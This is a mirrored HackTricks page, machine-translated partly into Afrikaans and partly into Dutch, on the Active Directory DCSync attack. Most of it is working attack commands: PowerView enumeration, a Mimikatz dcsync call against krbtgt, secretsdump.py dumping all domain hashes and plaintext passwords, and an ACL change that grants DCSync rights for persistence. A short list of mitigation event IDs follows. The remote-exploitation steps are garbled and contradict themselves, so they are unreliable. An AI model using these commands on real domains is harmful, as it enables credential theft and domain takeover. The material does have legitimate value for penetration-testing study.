Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 13:13:41 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/windows-hardening/active-directory-methodology/dcsync.md
Translator workflow 9f40607d8c Translated to Afrikaans
2024-02-11 02:07:06 +00:00

8.7 KiB
Raw Blame History

DCSync


Gebruik Trickest om maklik en outomatiese werkstrome te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.
Kry vandag toegang:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

DCSync

Die DCSync-toestemming impliseer dat hierdie toestemmings oor die domein self beskik word: DS-Replication-Get-Changes, Replicating Directory Changes All en Replicating Directory Changes In Filtered Set.

Belangrike notas oor DCSync:

  • Die DCSync-aanval boots die gedrag van 'n domeinbeheerder na en vra ander domeinbeheerders om inligting te repliseer deur die Directory Replication Service Remote Protocol (MS-DRSR) te gebruik. Omdat MS-DRSR 'n geldige en noodsaaklike funksie van Active Directory is, kan dit nie afgeskakel of gedeaktiveer word nie.
  • Standaard het slegs die Domain Admins, Enterprise Admins, Administrators en Domain Controllers-groepe die nodige bevoegdhede.
  • As enige rekeningwagwoorde met omkeerbare enkripsie gestoor word, is daar 'n opsie in Mimikatz beskikbaar om die wagwoord in duidelike teks terug te gee.

Opname

Kyk wie hierdie toestemmings het deur powerview te gebruik:

Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')}

Exploiteer Lokaal

Om de DCSync-aanval lokaal uit te voeren, moet je toegang hebben tot een Windows-machine die lid is van het Active Directory-domein. Volg de onderstaande stappen om de aanval uit te voeren:

  1. Verkrijg lokale beheerdersrechten op de Windows-machine.
  2. Installeer Mimikatz op de machine. Mimikatz is een krachtige tool die wordt gebruikt om inloggegevens te stelen en te manipuleren.
  3. Voer Mimikatz uit met de opdracht privilege::debug om debugprivileges te verkrijgen.
  4. Gebruik de opdracht lsadump::dcsync /user:<gebruikersnaam> om de NTLM-hash van het opgegeven gebruikersaccount op te halen.
  5. De verkregen NTLM-hash kan worden gebruikt om de beveiligingsprincipaal van het domein te imiteren en toegang te krijgen tot gevoelige informatie, zoals wachtwoorden van andere gebruikers.

Het is belangrijk op te merken dat deze aanvalsmethode alleen werkt als je lokale beheerdersrechten hebt op de Windows-machine.

Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

Exploiteer op afstand

Om de DCSync-aanval op afstand uit te voeren, moet je toegang hebben tot een systeem dat is verbonden met het doeldomein. Dit kan een Windows-machine zijn die lid is van het domein of een systeem dat is geconfigureerd als een domeincontroller. Volg de onderstaande stappen om de aanval uit te voeren:

  1. Identificeer een systeem dat is verbonden met het doeldomein en waarop je toegangsrechten hebt.
  2. Verkrijg de hash van het domeinaccount dat je wilt ophalen met behulp van de DCSync-aanval.
  3. Gebruik de verkregen hash om een Golden Ticket aan te maken met behulp van de Mimikatz-tool.
  4. Verkrijg de NTLM-hash van het domeinaccount dat je wilt ophalen met behulp van de Mimikatz-tool.
  5. Gebruik de verkregen NTLM-hash om de DCSync-aanval uit te voeren met behulp van de Mimikatz-tool.
  6. De DCSync-aanval zal de NTLM-hash van het domeinaccount ophalen en deze opslaan in een bestand.

Opmerking: Zorg ervoor dat je de nodige toestemming hebt voordat je deze aanval uitvoert, aangezien het ongeoorloofde toegang tot een domein kan inhouden.

secretsdump.py -just-dc <user>:<password>@<ipaddress> -outputfile dcsync_hashes
[-just-dc-user <USERNAME>] #To get only of that user
[-pwd-last-set] #To see when each account's password was last changed
[-history] #To dump password history, may be helpful for offline password cracking

-just-dc genereer 3 lêers:

  • een met die NTLM-hashes
  • een met die Kerberos-sleutels
  • een met klaarteks wagwoorde van die NTDS vir enige rekeninge wat ingestel is met omkeerbare enkripsie geaktiveer. Jy kan gebruikers met omkeerbare enkripsie kry met
Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol

Volharding

As jy 'n domein-admin is, kan jy hierdie regte aan enige gebruiker verleen met behulp van powerview:

Add-ObjectAcl -TargetDistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -PrincipalSamAccountName username -Rights DCSync -Verbose

Dan kan jy nagaan of die gebruiker korrek toegewys is aan die 3 voorregte deur na hulle te soek in die uitset van (jy behoort die name van die voorregte binne die "ObjectType" veld te sien):

Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{$_.IdentityReference -match "student114"}

Versagting

  • Sekuriteitsgebeurtenis-ID 4662 (Auditeerbeleid vir voorwerp moet geaktiveer word) - 'n Operasie is uitgevoer op 'n voorwerp
  • Sekuriteitsgebeurtenis-ID 5136 (Auditeerbeleid vir voorwerp moet geaktiveer word) - 'n Gidsdiensvoorwerp is gewysig
  • Sekuriteitsgebeurtenis-ID 4670 (Auditeerbeleid vir voorwerp moet geaktiveer word) - Regte op 'n voorwerp is verander
  • AD ACL-skandeerder - Skep en vergelyk skepverslae van ACL's. https://github.com/canix1/ADACLScanner

Verwysings

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:


Gebruik Trickest om maklik en outomatiese werksvloeie te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.
Kry vandag toegang:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}